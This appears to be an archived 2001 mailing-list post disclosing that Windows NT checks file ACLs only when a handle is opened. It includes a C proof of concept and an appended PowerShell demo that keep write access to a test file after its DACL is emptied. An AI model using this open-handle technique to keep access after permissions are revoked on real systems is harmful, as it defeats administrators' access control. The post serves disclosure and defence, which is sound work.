Sorry for the cross-post; I thought this would be relevant to both communities.

The component of the NT executive responsible for enforcing ACLs and DACLs is known as the Security Reference Monitor. When a kernel resource is requested, the requesting program specifies the type of access it desires. The SRM checks against the access list, and grants the requestor a HANDLE to the object if the requestor has appropriate rights. The check against the ACL only occurs when the HANDLE is first opened, however. If a HANDLE is opened and permissions on the object subsequently change, the original requestor of the object retains the original access permissions.

Therefore, it is possible to retain access to an object after the Creator/Owner or an administrator has changed the ACL simply by maintaining an open handle. If the requestor is a service or server program that is expected to run 24/7, the object will remain accessible long after the ACL has been altered [think ISAPI, extended stored procedures, et al.].

-- c0ncept

O/T: I own a Honda, and have been told by every mechanic that has looked at it that it is the easiest car to break into [the AAA guy was nice enough to demonstrate]. I hear newer Hondas are even easier.

Proof of concept:

1.) Create a file named "test.txt". Make it writeable to the current user.
2.) Compile and run the included C code.
3.) When the program prompts you to change the ACL, uncheck "Allow Inheritable Permissions to Propagate" and remove all entries from the ACL. Press <return> at the prompt.
4.) Take ownership of the file and open it. Notice that although the ACL had already been modified, the write succeeded.
[-- cut code here --]
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define FILE_NAME "test.txt"
#define MESSAGE   "Test"
#define MSG_LEN   4

int main(int argc, char** argv)
{
    HANDLE fileHandle;
    DWORD  written;

    /* The SRM checks the DACL here, once, when the handle is opened. */
    fileHandle = CreateFile(FILE_NAME, GENERIC_WRITE,
                            FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                            OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (fileHandle == INVALID_HANDLE_VALUE) {
        /* Win32 API failures are reported via GetLastError(), not errno. */
        fprintf(stderr, "CreateFile failed (error %lu).\n", GetLastError());
        exit(1);
    }

    printf("Change the file's ACLs and press enter.");
    fflush(stdout);
    getchar();

    /* No re-check against the (now altered) DACL: the open handle keeps
       the GENERIC_WRITE access it was granted above. */
    if (WriteFile(fileHandle, MESSAGE, MSG_LEN, &written, NULL))
        printf("WriteFile succeeded (%lu bytes written).\n", written);
    else
        printf("WriteFile failed (error %lu).\n", GetLastError());

    CloseHandle(fileHandle);
    return 0;
}
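The same open-time check seen from an administrator's side, as an added example that is not part of the original post: it strips the DACL programmatically instead of by hand and contrasts a fresh open (denied) with the handle opened earlier (still writes). It assumes a scratch file under $env:TEMP that the current user owns.

```powershell
# Added example (not from the original post). Scratch file path is an assumption.
$path = Join-Path $env:TEMP 'srm-handle-demo.txt'
Set-Content -Path $path -Value 'initial'

# 1. Open a handle while the DACL still grants write access. Share mode is
#    ReadWrite so a later open can only be refused by the ACL, not by sharing.
$stream = [System.IO.File]::Open($path, 'Open', 'ReadWrite', 'ReadWrite')

# 2. Do what the post does by hand: stop inheriting, then remove every ACE.
$acl = Get-Acl -Path $path
$acl.SetAccessRuleProtection($true, $false)          # drop inherited ACEs
foreach ($rule in @($acl.Access)) { $null = $acl.RemoveAccessRule($rule) }
Set-Acl -Path $path -AclObject $acl                   # empty DACL = nobody

# 3. A fresh open is checked against the new (empty) DACL and is denied ...
try {
    [System.IO.File]::Open($path, 'Open', 'ReadWrite', 'ReadWrite') | Out-Null
    Write-Output 'new open: unexpectedly succeeded'
} catch [System.UnauthorizedAccessException] {
    Write-Output 'new open: access denied (expected)'
}

# 4. ... but the handle from step 1 was checked only when it was opened,
#    so the write goes through even though the DACL now grants nothing.
$bytes = [System.Text.Encoding]::ASCII.GetBytes('written after ACL change')
$stream.Write($bytes, 0, $bytes.Length)
$stream.Close()
Write-Output 'old handle: write succeeded (expected)'

# Cleanup: the owner implicitly holds WRITE_DAC, so we can put a DACL back
# and remove the scratch file.
$me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$acl.SetAccessRule((New-Object System.Security.AccessControl.FileSystemAccessRule($me, 'FullControl', 'Allow')))
Set-Acl -Path $path -AclObject $acl
Get-Content -Path $path          # shows the text written after the ACL change
Remove-Item -Path $path

# Consequence for operations: tightening a DACL is not enforced on a process
# that already holds a handle. After an ACL change, restart the service
# (Restart-Service) or locate the holder (e.g. Sysinternals handle.exe).
```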
This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 22:08:20 PDT